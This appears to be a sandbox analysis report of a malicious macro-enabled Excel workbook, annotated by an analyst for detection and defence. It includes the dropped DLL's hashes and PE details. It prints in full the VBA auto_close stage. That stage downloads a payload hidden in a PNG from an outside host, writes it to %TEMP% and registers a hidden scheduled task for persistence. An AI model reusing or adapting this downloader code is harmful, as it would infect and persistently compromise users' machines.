
Remarks (2/2)

(0x0200000E): The overall sleep time of all monitored processes was truncated from "23 minutes, 6 seconds" to "1 minute, 10 seconds" to reveal dormant functionality.

(0x02000004): The operating system was rebooted during the analysis because the sample installed a startup script, task or application for persistence.

File Name Category Type Verdict Actions
C:\Users\kEecfMwgj\Desktop\msk.xls Sample File Office File
Malicious
MIME Type application/vnd.ms-excel.sheet.macroEnabled.12
File Size 6.26 MB
MD5 d57de46a209c32633dbb10f36eef7a06 Copy to Clipboard
SHA1 ebf2d3f3e47b39e8783330f1a6aa6f510e2a7a7f Copy to Clipboard
SHA256 5dbcefc3f5401265b8fe4bb0c8a645914b45b850a13dfaa5ec313ec8e108b2c5 Copy to Clipboard
SSDeep 49152:qtI1YCAnrStN354aGlhG10h8/M4dp0btcfPYIUdLC71:zNAnc36aGlhG168/M4diuojdLC71 Copy to Clipboard
ImpHash -
Office Information
Creator Usuario Agrest
Last Modified By george
Create Time 2018-11-27 15:26 (UTC)
Modify Time 2024-05-16 15:13 (UTC)
Application Microsoft Excel
App Version 16.0300
Document Security NONE
Worksheets 10
Titles Of Parts Hoja2, Hoja1, Listado, 2019, 2020, 2021, 2022, 2023, 2024, por persona
ScaleCrop False
SharedDoc False
VBA Macros (8)
Macro #1: Module7
Attribute VB_Name = "Module7"
' Analyst note: this module carries the malicious stage of the workbook; the
' remaining modules look like the document's original business macros.
' FW01 is user32!FindWindowA behind an innocuous alias, declared for both
' 64-bit hosts (VBA7 / PtrSafe) and legacy 32-bit hosts. auto_close below
' uses it to look for a window class name before doing anything else.
#If VBA7 Then
  Declare PtrSafe Function FW01 Lib "user32" _
    Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
   #Else
     Declare Function FW01 Lib "user32" _
    Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
   
        #End If


Option Explicit

Private Sub auto_close()
' Analyst note: auto_close is a legacy Excel auto-run name, so this runs when
' the workbook is closed. Observable behaviour, in order:
'   1. Exit if a window with class name "msprotB7" already exists (marker check).
'   2. HTTPS GET of a PNG from picstate.com via WinHTTP.
'   3. Skip the first 98 bytes of the response and carve three fixed-size
'      segments (218109 / 3890 / 1768 bytes); the first segment must have a
'      byte sum of 18880222 or the macro bails out.
'   4. Drop the segments to %TEMP% as TTT.tmp, check01.txt and ZZ11.tmp.
'   5. Read ZZ11.tmp as text, replace "xxx" with %USERNAME%, write Z11.xml.
'   6. Register a scheduled task "\Z11" from that XML with schtasks.exe,
'      preferring the sysnative copy so the 64-bit binary is used from a
'      32-bit Office process.
' Detection: Excel spawning schtasks.exe /Create /XML with a path in %TEMP%,
' Excel making WinHTTP requests to an image host, and the %TEMP% file names
' above are all high-signal. Mitigation: block macros from the internet zone,
' alert on Office-spawned schtasks, and monitor for the "\Z11" task.
' All errors are swallowed (On Error Resume Next), so any failing step is
' silently skipped rather than aborting the chain.
 On Error Resume Next
 Dim iTxtFile22 As Integer
  ' VBA quirk: only the last name in each line gets "As String"; strFile88 and
  ' strFileT44 are Variants. cta1 is never used.
  Dim strFile88, cta1 As String
  Dim strFileT44, TestStr As String
 
' FindWindowA(lpClassName="msprotB7"): a non-zero handle means the marker
' window exists and the stage stops. Probably an already-running / already-
' infected check owned by the dropped payload -- confirm against the DLL.
If (FW01("msprotB7", vbNullString)) <> 0 Then Exit Sub
 
 ' Sizes of the three segments carved out of the download. Their sum plus the
 ' 98-byte prefix is close to the ~218 KB size reported for the PNG.
 Const Mysze As Long = 218109  '
 Const Chek As Long = 3890
 Const Z11file As Long = 1768

   
    Dim FileData() As Byte
    
     Dim i As Long
     ' Named "crc" but used as a plain byte sum (see the check below).
     Dim crc As Double
     Dim bytTemp2 As Byte
     
      Dim myM(Mysze - 1) As Byte
      Dim myM2(Chek - 1) As Byte
      Dim myM3(Z11file - 1) As Byte
     
    Dim MyFile As String
    Dim WHTTP As Object
    
    On Error Resume Next
       ' WinHTTP COM client, with a fallback ProgID if the first one is missing.
       Set WHTTP = CreateObject("WinHTTP.WinHTTPrequest.5")
        If Err.Number <> 0 Then
            Set WHTTP = CreateObject("WinHTTP.WinHTTPrequest.5.1")
        End If
  
    
   
    
    ' Hard-coded download URL; the payload is carried inside a PNG on a
    ' public image host (see the downloaded-file entry in the report).
    MyFile = "https://picstate.com/file/20260941_ugxbx/B7CHZ11.png"
    
    ' Synchronous GET (async flag False).
    WHTTP.Open "GET", MyFile, False
    ' SetTimeout8s is not a WinHttpRequest member (the real method is
    ' SetTimeouts); the call fails and is swallowed by On Error Resume Next,
    ' so default timeouts apply. The value of i is overwritten below anyway.
    i = WHTTP.SetTimeout8s(5000, 5000, 5000, 10000)
    WHTTP.Send
    ' ResponseBody is a byte array of the whole response.
    FileData = WHTTP.ResponseBody
    Set WHTTP = Nothing
    

   crc = 0
   
   ' Segment 1 (Mysze bytes) starts at offset 98; summed into crc as it is copied.
   ' The inline comment mentions an XOR with &H26 that this code does not perform.
   For i = 0 To Mysze - 1
     
   bytTemp2 = (FileData(i + 98))  '98 size down.png Xor (&H26)
   
   
   crc = crc + bytTemp2
   
   myM(i) = bytTemp2
   
   Next i
             

   
   ' Integrity / anti-tamper gate: wrong download (or a sandbox substituting the
   ' response) makes the byte sum miss and the stage stops here.
   If crc <> 18880222 Then Exit Sub
    
    
  ' Segment 2 (Chek bytes) directly follows segment 1.
  For i = 0 To Chek - 1
     
   bytTemp2 = (FileData(i + Mysze + 98)) '98 size down.png Xor (&H26)
   
   
   myM2(i) = bytTemp2
   
   Next i
    
    
     ' Segment 3 (Z11file bytes) follows segment 2.
     For i = 0 To Z11file - 1
     
   bytTemp2 = (FileData(i + Mysze + 98 + Chek)) '98 size down.png  Xor (&H26)
   
   
   myM3(i) = bytTemp2
   
   Next i
    
' Segment 3 -> %TEMP%\ZZ11.tmp (the report lists it as text/xml, 1.72 KB).
Open Environ("temp") + "\ZZ11.tmp" For Binary Lock Read Write As #1

    Put #1, , myM3
    
    Close #1


' Segment 1 -> %TEMP%\TTT.tmp (~213 KB; the report pairs it with the dropped DLL).
Open Environ("temp") + "\TTT.tmp" For Binary Lock Read Write As #2

    Put #2, , myM
    
    Close #2
    
' Segment 2 -> %TEMP%\check01.txt (the report also sees it as check01.bat).
Open Environ("temp") + "\check01.txt" For Binary Lock Read Write As #3

    Put #3, , myM2
    
    Close #3

  ' Read ZZ11.tmp back as text. FreeFile is evaluated twice; that only yields
  ' the same channel because nothing is opened in between.
  strFile88 = Environ("temp") + "\ZZ11.tmp"
  iTxtFile22 = FreeFile
  Open strFile88 For Input As FreeFile
  strFileT44 = Input(LOF(iTxtFile22), iTxtFile22)
  Close iTxtFile22
    
  ' Personalise the task template: every case-insensitive "xxx" becomes the
  ' current user name (presumably a principal/user placeholder in the XML).
  strFileT44 = Replace(strFileT44, "xxx", Environ("USERNAME"), 1, -1, 1)
  
  Dim Fn34 As String
    ' Personalised task definition -> %TEMP%\Z11.xml
    Fn34 = Environ("temp") + "\Z11.xml"
    Open Fn34 For Output As #4
    Print #4, strFileT44
    Close #4

' Same VBA quirk as above: sysnat is a Variant, mys3 a String.
Dim sysnat, mys3 As String
    TestStr = ""
' If %windir%\sysnative\schtasks.exe is visible (32-bit process on 64-bit
' Windows), use it to side-step WOW64 file system redirection.
TestStr = Dir(Environ("windir") + "\sysnative\schtasks.exe")
    If TestStr = "" Then sysnat = "" Else sysnat = Environ("windir") + "\sysnative\"


' Persistence: schtasks /Create /TN \Z11 /f /XML %TEMP%\Z11.xml
' (this is the startup task the sandbox remark refers to).
mys3 = " /Create  /TN \Z11" + " /f /XML " + Environ("temp") + "\Z11.xml"

' Hidden window; the leading space in mys3 separates "schtasks" from its arguments.
Call Shell(sysnat + "schtasks" & mys3, vbHide)


    
End Sub


Macro #2: Módulo1
Attribute VB_Name = "Módulo1"
'http://excel-elearning.blogspot.com/2017/11/excel-vba-how-to-create-folders-and-sub.html
'https://www.ozgrid.com/forum/forum/help-forums/excel-general/94891-execute-command-button-code-using-enter-key

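Sub CrearSub_Carpetas()
' Creates one folder per used row of Hoja2 (name taken from column E) next to
' this workbook, closes UserForm1 and reports the quotation number in Hoja1!B3.
' The folder names come straight from cell contents. They used to be spliced
' into "cmd /c mkdir ...", so a crafted cell value could append extra shell
' commands; folders are now created with MkDir, which takes the path as data.
' Nested names (a\b\c) are still created segment by segment, as cmd's mkdir did.
' Errors (existing folder, invalid name) are ignored, as before.

'Execute next line in case of error.
On Error Resume Next

'Activa la Hoja2
Sheets("Hoja2").Activate

'Loop through all the cells in column 5 of the active sheet.
For i = 1 To ActiveSheet.UsedRange.Rows.Count

'Name of the Folder
sFolderPath = ThisWorkbook.Path & "\" & Cells(i, 5)  'Replace This.Workbook.Path with any location Example "C:\" & Cells(i,1)

'Create the folder (and any missing parent folders) without going through cmd.exe
CrearCarpetaRecursiva CStr(sFolderPath)

'To continue the Loop
Next i

'Cerrar ventana Creación de obras
Unload UserForm1

'Displaying Message
MsgBox "El número de cotización " & Worksheets("Hoja1").Range("B3") & " ha sido generado con sus respectivas carpetas."

Sheets("Listado").Activate



End Sub

' Creates every missing segment of sRuta (drive or UNC path) with MkDir.
' The root (C: or \\server\share) is never created; existing segments and
' empty segments (double or trailing backslashes) are skipped. Errors are
' left to the caller's handler.
Private Sub CrearCarpetaRecursiva(ByVal sRuta As String)
    Dim partes() As String
    Dim acumulado As String
    Dim inicio As Long
    Dim k As Long

    partes = Split(sRuta, "\")
    If Left$(sRuta, 2) = "\\" Then
        ' UNC: Split gives "", "", server, share, ... -- the share is the root
        acumulado = "\\" & partes(2) & "\" & partes(3)
        inicio = 4
    Else
        ' Local: the first segment is the drive letter (e.g. "C:")
        acumulado = partes(0)
        inicio = 1
    End If

    For k = inicio To UBound(partes)
        If Len(partes(k)) > 0 Then
            acumulado = acumulado & "\" & partes(k)
            If Len(Dir(acumulado, vbDirectory)) = 0 Then MkDir acumulado
        End If
    Next k
End Sub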

Macro #3: Módulo2
Attribute VB_Name = "Módulo2"
'Realizado por Celeste Pesce

Sub Copiarceldavacia()
' Appends the data row Hoja1!A2:R2 (values only) to "Listado": column B is
' scanned from row 3 downwards and the paste goes into the first empty cell.
' The sheet is unprotected first and re-protected afterwards (see Módulo4),
' then the workbook is saved so the new row is not lost.

Dim filaLibre As Integer

Desprotejerhoja

With ThisWorkbook
    .Sheets("Hoja1").Range("A2:R2").Copy

    ' Find the first empty cell in column B of Listado, starting at row 3
    filaLibre = 3
    While .Sheets("Listado").Cells(filaLibre, 2) <> Empty
        filaLibre = filaLibre + 1
    Wend

    .Sheets("Listado").Cells(filaLibre, 2).PasteSpecial Paste:=xlPasteValues
End With
Application.CutCopyMode = False

Protejerhoja

'Guardar documento para no perder la información cargada
ThisWorkbook.Save

End Sub


Macro #4: Módulo3
Attribute VB_Name = "Módulo3"
'Realizado por Celeste Pesce

Sub Abrirformulario()
' Opens the data-entry form; UserForm_Initialize fills in its header label.
    Call UserForm1.Show
End Sub

Macro #5: Módulo4
Attribute VB_Name = "Módulo4"
'https://exceltotal.com/proteger-una-hoja-de-excel-desde-una-macro/

Sub Protejerhoja()
' Selects "Listado" and protects it with the sheet password while still
' allowing AutoFilter. Worksheet protection only guards against accidental
' edits -- it is not an access control, and the password is plain text here.
    Sheets("Listado").Select
    With ActiveSheet
        .Protect Password:="Jacobo2", AllowFiltering:=True
    End With
End Sub


Sub Desprotejerhoja()
' Selects "Listado" and lifts the protection applied by Protejerhoja.
    Sheets("Listado").Select
    With ActiveSheet
        .Unprotect Password:="Jacobo2"
    End With
End Sub
Macro #6: Módulo5
Attribute VB_Name = "Módulo5"
'Creado por Celeste Pesce
'https://analysistabs.com/excel-vba/copy-files-one-location-another-folder-directory/

'In this Example I am Copying the File From "C:Temp" Folder to "D:Job" Folder

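Sub Copiararchivo()
' Copies every file named in Hoja1 column A (row 12 down to the first empty
' cell) from the document-master share into the quotation folder
' "<workbook folder>\<Hoja1!A1>\", overwriting existing copies.
' The FileSystemObject and both folder paths are loop-invariant, so they are
' set up once instead of on every pass. Not called from the visible code
' (the call in CommandButton1_Click is commented out).

'Declare Variables
Dim FSO As Object
Dim sFile As String
Dim sSFolder As String
Dim sDFolder As String
Dim j As Integer

'Change to match the source folder path
sSFolder = "\\192.168.85.20\16 - Gestion de la Organizacion\01 - Maestro de Documentación\FO\"

'Change to match the destination folder path
'Texto original:  sDFolder = "D:\Job\"
sDFolder = ThisWorkbook.Path & "\" & Sheets("Hoja1").Cells(1, 1) & "\"

'Create Object
Set FSO = CreateObject("Scripting.FileSystemObject")

'Hacer loop para que en Hoja1 se coloquen los archivos a copiar en la carpeta madre de la cotización
j = 12

Do While ThisWorkbook.Sheets("Hoja1").Cells(j, 1) <> Empty

    'This is Your File Name which you want to Copy
    sFile = ThisWorkbook.Sheets("Hoja1").Cells(j, 1)

    'Third argument True = overwrite an existing destination file
    FSO.CopyFile (sSFolder & sFile), sDFolder, True

    j = j + 1

Loop

Set FSO = Nothing

End Sub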
Macro #7: Módulo6
Attribute VB_Name = "Módulo6"
Sub Calling_Private_Macro()
' Analyst note: runs a procedure named "vba" in Module7 via Application.Run,
' which can reach Private procedures. No procedure of that name exists in
' Module7 as shown (it only defines auto_close), so this call would fail at
' runtime -- it may be a leftover from another build of the stage. The
' malicious code is reached through auto_close when the workbook closes.
 
    Application.Run "Module7.vba"
 
End Sub
Macro #8: UserForm1
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E8C9C890-90D2-4EF7-89DF-402AE04F7B1A}{F5AFA137-F17F-4F50-8221-D62605473B55}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False










'Realizado por Celeste Pesce





Private Sub Frame1_Click()
' Empty click handler for Frame1 -- appears to be a designer-generated stub
' with no behaviour.
End Sub

Private Sub TextBox11_Change()
' Mirrors the TextBox11 entry into Label33, followed by its unit (t/h).
    Dim valor As String
    valor = TextBox11.Text
    Label33.Caption = valor & " t/h"
End Sub

Private Sub TextBox12_Change()
' Mirrors the TextBox12 entry into Label34, followed by its unit (barg).
    Dim valor As String
    valor = TextBox12.Text
    Label34.Caption = valor & " barg"
End Sub

Private Sub TextBox13_Change()
' Mirrors the TextBox13 entry into Label35, followed by its unit (ºC).
    Dim valor As String
    valor = TextBox13.Text
    Label35.Caption = valor & " ºC"
End Sub


Private Sub UserForm_Initialize()
' Builds the header label as "<Hoja1!B4>-<Hoja1!B3>" when the form loads.
    With Worksheets("Hoja1")
        Label11.Caption = .Range("B4").Value & "-" & .Range("B3").Value
    End With
End Sub



Private Sub CommandButton1_Click()
' Writes the form entries into Hoja1: B4, "-" and B3 go to A2:C2, the text
' boxes to D2:N2 (in the order listed below) and the three check boxes to
' O3:Q3. Then the quotation folders are created and the row is appended to
' "Listado"; the file-copy step is disabled.
    Dim numerosCaja As Variant
    Dim k As Long
    Dim columna As Long

    With Sheets("Hoja1")
        .Cells(2, 1) = Worksheets("Hoja1").Range("B4")
        .Cells(2, 2) = "-"
        .Cells(2, 3) = Worksheets("Hoja1").Range("B3")

        ' Text boxes 2,3,5..13 fill columns D..N (TextBox4 is not written)
        numerosCaja = Array(2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13)
        columna = 4
        For k = 0 To UBound(numerosCaja)
            .Cells(2, columna) = Me.Controls("TextBox" & numerosCaja(k)).Value
            columna = columna + 1
        Next k

        ' Check boxes 1..3 go one row lower, columns O..Q
        For k = 1 To 3
            .Cells(3, 14 + k) = Me.Controls("CheckBox" & k).Value
        Next k
    End With

    CrearSub_Carpetas
    'Copiararchivo
    Copiarceldavacia

End Sub

Private Sub userform_terminate()
' Re-protects "Listado" whenever the form is closed, however it was closed.
    Call Protejerhoja
End Sub
Extracted Image Texts (1)
Image #1: image1.jpeg
AGREST
Extracted URLs (1)
URL WHOIS Data Reputation Status Recursively Submitted Actions
Not Queried
C:\Users\kEecfMwgj\AppData\Local\{D77D06B2-C71E-C031-9266-658FBD2652B7}\B79266.DLL Dropped File Binary
Suspicious
MIME Type application/vnd.microsoft.portable-executable
File Size 213.00 KB
MD5 8c400b552e17c9763048f312fd304c3d Copy to Clipboard
SHA1 e41d2b7e1dc3aae98e1f18a45107c90b022714c1 Copy to Clipboard
SHA256 ebb38b608cc64b140273b3568ba22398c7b052a3c3bfac3cc15f370a0e1764bc Copy to Clipboard
SSDeep 3072:VCvtVds2wtYdDaAhIp7qkZCKkmDGzjXtjOPM:grDaXZCPrjZP Copy to Clipboard
ImpHash 12f4c9d6376202959258c794f895eb63 Copy to Clipboard
PE Information
Image Base 0x00400000
Entry Point 0x00428ED0
Size Of Code 0x0002C000
Size Of Initialized Data 0x00009000
File Type IMAGE_FILE_DLL
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_AMD64
Compile Timestamp 2024-01-04 03:42 (UTC)
Version Information (8)
CompanyName Microsoft Corporation
FileDescription Application Compatibility Client Library
FileVersion 6.0.6300.13146 (vista_rtm.-2022)
InternalName VBhelp
LegalCopyright Microsoft Corporation. All rights reserved.
OriginalFilename VBB5
ProductName Microsoft Windows Operating System
ProductVersion 08.09.2023.1495
Sections (10)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x00401000 0x0002BE50 0x0002C000 0x00000400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 5.78
.data 0x0042D000 0x00003D18 0x00003E00 0x0002C400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.18
.bss 0x00431000 0x00007D20 0x00000000 0x00000000 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.0
.idata 0x00439000 0x00001200 0x00001200 0x00030200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.21
.didata 0x0043B000 0x000000C8 0x00000200 0x00031400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.88
.edata 0x0043C000 0x000000E2 0x00000200 0x00031600 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 2.72
.rdata 0x0043D000 0x00000045 0x00000200 0x00031800 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 1.19
.reloc 0x0043E000 0x00001420 0x00001600 0x00031A00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 5.59
.pdata 0x00440000 0x00001D40 0x00001E00 0x00033000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 5.21
.rsrc 0x00442000 0x00000454 0x00000600 0x00034E00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.06
Imports (6)
mpr.dll (2)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
WNetEnumResourceW - 0x004394D0 0x00039090 0x00030290 0x00000000
WNetOpenEnumW - 0x004394D8 0x00039098 0x00030298 0x00000000
kernel32.dll (81)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SetFileTime - 0x004394E8 0x000390A8 0x000302A8 0x00000000
GetFileType - 0x004394F0 0x000390B0 0x000302B0 0x00000000
RtlUnwindEx - 0x004394F8 0x000390B8 0x000302B8 0x00000000
GetACP - 0x00439500 0x000390C0 0x000302C0 0x00000000
SetFilePointer - 0x00439508 0x000390C8 0x000302C8 0x00000000
CloseHandle - 0x00439510 0x000390D0 0x000302D0 0x00000000
LocalFree - 0x00439518 0x000390D8 0x000302D8 0x00000000
TlsAlloc - 0x00439520 0x000390E0 0x000302E0 0x00000000
GetTickCount - 0x00439528 0x000390E8 0x000302E8 0x00000000
TerminateThread - 0x00439530 0x000390F0 0x000302F0 0x00000000
FindNextFileW - 0x00439538 0x000390F8 0x000302F8 0x00000000
VirtualFree - 0x00439540 0x00039100 0x00030300 0x00000000
GetFileSize - 0x00439548 0x00039108 0x00030308 0x00000000
GetStartupInfoW - 0x00439550 0x00039110 0x00030310 0x00000000
ExitProcess - 0x00439558 0x00039118 0x00030318 0x00000000
InitializeCriticalSection - 0x00439560 0x00039120 0x00030320 0x00000000
GetCurrentProcess - 0x00439568 0x00039128 0x00030328 0x00000000
GlobalLock - 0x00439570 0x00039130 0x00030330 0x00000000
VirtualAlloc - 0x00439578 0x00039138 0x00030338 0x00000000
RtlUnwind - 0x00439580 0x00039140 0x00030340 0x00000000
GetTempPathW - 0x00439588 0x00039148 0x00030348 0x00000000
GetCommandLineW - 0x00439590 0x00039150 0x00030350 0x00000000
GetSystemInfo - 0x00439598 0x00039158 0x00030358 0x00000000
GetProcAddress - 0x004395A0 0x00039160 0x00030360 0x00000000
GetStdHandle - 0x004395A8 0x00039168 0x00030368 0x00000000
FileTimeToLocalFileTime - 0x004395B0 0x00039170 0x00030370 0x00000000
WinExec - 0x004395B8 0x00039178 0x00030378 0x00000000
GetVersionExW - 0x004395C0 0x00039180 0x00030380 0x00000000
GetModuleHandleA - 0x004395C8 0x00039188 0x00030388 0x00000000
GetModuleHandleW - 0x004395D0 0x00039190 0x00030390 0x00000000
FreeLibrary - 0x004395D8 0x00039198 0x00030398 0x00000000
FileTimeToDosDateTime - 0x004395E0 0x000391A0 0x000303A0 0x00000000
ReadFile - 0x004395E8 0x000391A8 0x000303A8 0x00000000
DosDateTimeToFileTime - 0x004395F0 0x000391B0 0x000303B0 0x00000000
FindFirstFileW - 0x004395F8 0x000391B8 0x000303B8 0x00000000
TlsFree - 0x00439600 0x000391C0 0x000303C0 0x00000000
GetConsoleOutputCP - 0x00439608 0x000391C8 0x000303C8 0x00000000
GetConsoleCP - 0x00439610 0x000391D0 0x000303D0 0x00000000
GetLastError - 0x00439618 0x000391D8 0x000303D8 0x00000000
GetModuleFileNameW - 0x00439620 0x000391E0 0x000303E0 0x00000000
GlobalAlloc - 0x00439628 0x000391E8 0x000303E8 0x00000000
GlobalUnlock - 0x00439630 0x000391F0 0x000303F0 0x00000000
DisableThreadLibraryCalls - 0x00439638 0x000391F8 0x000303F8 0x00000000
CreateThread - 0x00439640 0x00039200 0x00030400 0x00000000
QueryPerformanceCounter - 0x00439648 0x00039208 0x00030408 0x00000000
SetEndOfFile - 0x00439650 0x00039210 0x00030410 0x00000000
CopyFileW - 0x00439658 0x00039218 0x00030418 0x00000000
WideCharToMultiByte - 0x00439660 0x00039220 0x00030420 0x00000000
FindClose - 0x00439668 0x00039228 0x00030428 0x00000000
MultiByteToWideChar - 0x00439670 0x00039230 0x00030430 0x00000000
LoadLibraryW - 0x00439678 0x00039238 0x00030438 0x00000000
LoadLibraryA - 0x00439680 0x00039240 0x00030440 0x00000000
GetVolumeInformationW - 0x00439688 0x00039248 0x00030448 0x00000000
CreateFileW - 0x00439690 0x00039250 0x00030450 0x00000000
GetDriveTypeW - 0x00439698 0x00039258 0x00030458 0x00000000
GetVersion - 0x004396A0 0x00039260 0x00030460 0x00000000
DeleteFileW - 0x004396A8 0x00039268 0x00030468 0x00000000
MoveFileW - 0x004396B0 0x00039270 0x00030470 0x00000000
RaiseException - 0x004396B8 0x00039278 0x00030478 0x00000000
IsDBCSLeadByteEx - 0x004396C0 0x00039280 0x00030480 0x00000000
OpenProcess - 0x004396C8 0x00039288 0x00030488 0x00000000
SwitchToThread - 0x004396D0 0x00039290 0x00030490 0x00000000
GetExitCodeThread - 0x004396D8 0x00039298 0x00030498 0x00000000
WaitForSingleObject - 0x004396E0 0x000392A0 0x000304A0 0x00000000
GetSystemPowerStatus - 0x004396E8 0x000392A8 0x000304A8 0x00000000
WriteFile - 0x004396F0 0x000392B0 0x000304B0 0x00000000
LocalFileTimeToFileTime - 0x004396F8 0x000392B8 0x000304B8 0x00000000
DeleteCriticalSection - 0x00439700 0x000392C0 0x000304C0 0x00000000
TlsGetValue - 0x00439708 0x000392C8 0x000304C8 0x00000000
SleepEx - 0x00439710 0x000392D0 0x000304D0 0x00000000
TlsSetValue - 0x00439718 0x000392D8 0x000304D8 0x00000000
TerminateProcess - 0x00439720 0x000392E0 0x000304E0 0x00000000
FileTimeToSystemTime - 0x00439728 0x000392E8 0x000304E8 0x00000000
LocalAlloc - 0x00439730 0x000392F0 0x000304F0 0x00000000
RemoveDirectoryW - 0x00439738 0x000392F8 0x000304F8 0x00000000
GetCurrentThreadId - 0x00439740 0x00039300 0x00030500 0x00000000
UnhandledExceptionFilter - 0x00439748 0x00039308 0x00030508 0x00000000
VirtualQuery - 0x00439750 0x00039310 0x00030510 0x00000000
GlobalFree - 0x00439758 0x00039318 0x00030518 0x00000000
Sleep - 0x00439760 0x00039320 0x00030520 0x00000000
SetThreadLocale - 0x00439768 0x00039328 0x00030528 0x00000000
ole32.dll (2)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CoInitializeEx - 0x00439778 0x00039338 0x00030538 0x00000000
CoUninitialize - 0x00439780 0x00039340 0x00030540 0x00000000
user32.dll (33)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CreateWindowExW - 0x00439790 0x00039350 0x00030550 0x00000000
EnumDisplaySettingsW - 0x00439798 0x00039358 0x00030558 0x00000000
GetMessageW - 0x004397A0 0x00039360 0x00030560 0x00000000
GetWindowDC - 0x004397A8 0x00039368 0x00030568 0x00000000
TranslateMessage - 0x004397B0 0x00039370 0x00030570 0x00000000
GetSystemMetrics - 0x004397B8 0x00039378 0x00030578 0x00000000
PostMessageW - 0x004397C0 0x00039380 0x00030580 0x00000000
MessageBoxW - 0x004397C8 0x00039388 0x00030588 0x00000000
SetWindowTextW - 0x004397D0 0x00039390 0x00030590 0x00000000
AttachThreadInput - 0x004397D8 0x00039398 0x00030598 0x00000000
PostQuitMessage - 0x004397E0 0x000393A0 0x000305A0 0x00000000
keybd_event - 0x004397E8 0x000393A8 0x000305A8 0x00000000
MapVirtualKeyW - 0x004397F0 0x000393B0 0x000305B0 0x00000000
LoadImageW - 0x004397F8 0x000393B8 0x000305B8 0x00000000
GetDesktopWindow - 0x00439800 0x000393C0 0x000305C0 0x00000000
DispatchMessageW - 0x00439808 0x000393C8 0x000305C8 0x00000000
GetCursorPos - 0x00439810 0x000393D0 0x000305D0 0x00000000
SetCursorPos - 0x00439818 0x000393D8 0x000305D8 0x00000000
GetTopWindow - 0x00439820 0x000393E0 0x000305E0 0x00000000
SendMessageW - 0x00439828 0x000393E8 0x000305E8 0x00000000
ShowWindow - 0x00439830 0x000393F0 0x000305F0 0x00000000
SystemParametersInfoW - 0x00439838 0x000393F8 0x000305F8 0x00000000
LoadIconW - 0x00439840 0x00039400 0x00030600 0x00000000
DefWindowProcW - 0x00439848 0x00039408 0x00030608 0x00000000
GetForegroundWindow - 0x00439850 0x00039410 0x00030610 0x00000000
RegisterClassW - 0x00439858 0x00039418 0x00030618 0x00000000
GetWindowThreadProcessId - 0x00439860 0x00039420 0x00030620 0x00000000
GetDC - 0x00439868 0x00039428 0x00030628 0x00000000
GetFocus - 0x00439870 0x00039430 0x00030630 0x00000000
LoadCursorW - 0x00439878 0x00039438 0x00030638 0x00000000
ReleaseDC - 0x00439880 0x00039440 0x00030640 0x00000000
mouse_event - 0x00439888 0x00039448 0x00030648 0x00000000
FindWindowW - 0x00439890 0x00039450 0x00030650 0x00000000
oleaut32.dll (2)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SysAllocStringLen - 0x004398A0 0x00039460 0x00030660 0x00000000
SysFreeString - 0x004398A8 0x00039468 0x00030668 0x00000000
gdi32.dll (10)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetObjectW - 0x004398B8 0x00039478 0x00030678 0x00000000
SelectPalette - 0x004398C0 0x00039480 0x00030680 0x00000000
CreateCompatibleBitmap - 0x004398C8 0x00039488 0x00030688 0x00000000
DeleteObject - 0x004398D0 0x00039490 0x00030690 0x00000000
SelectObject - 0x004398D8 0x00039498 0x00030698 0x00000000
DeleteDC - 0x004398E0 0x000394A0 0x000306A0 0x00000000
BitBlt - 0x004398E8 0x000394A8 0x000306A8 0x00000000
CreateDIBSection - 0x004398F0 0x000394B0 0x000306B0 0x00000000
GetDIBits - 0x004398F8 0x000394B8 0x000306B8 0x00000000
CreateCompatibleDC - 0x00439900 0x000394C0 0x000306C0 0x00000000
Exports (6)
API Name EAT Address Ordinal
Control_RunDLL 0x00027D20 0x00000003
DllCanUnloadNow 0x00028EB0 0x00000005
DllGetClassObject 0x00028B30 0x00000006
DllRegisterServer 0x00028B00 0x00000004
__dbk_fcall_wrapper 0x0000E450 0x00000002
dbkFCallWrapperAddr 0x000371A8 0x00000001
C:\Users\KEECFM~1\AppData\Local\Temp\TTT.TMP Dropped File Stream
Clean
Also Known As C:\Users\KEECFM~1\AppData\Local\Temp\TTT.tmp (Accessed File, Dropped File)
MIME Type application/octet-stream
File Size 212.99 KB
MD5 a99f7c4fb657a386c39bbaea73f7c8bd Copy to Clipboard
SHA1 eb0a75ff3c696d141bf5d142d0ac77cb7352e94f Copy to Clipboard
SHA256 3f2e57aa025065184ceff957838a11e342d161febd4119d89b89a98c758ad9a9 Copy to Clipboard
SSDeep 3072:sCvtVds2wtYdDaAhIp7qkZCKkmDGzjXtjOPM:NrDaXZCPrjZP Copy to Clipboard
ImpHash -
C:\Users\KEECFM~1\AppData\Local\Temp\check01.bat Dropped File Text
Clean
Also Known As C:\Users\KEECFM~1\AppData\Local\Temp\check01.txt (Accessed File, Dropped File)
MIME Type text/x-msdos-batch
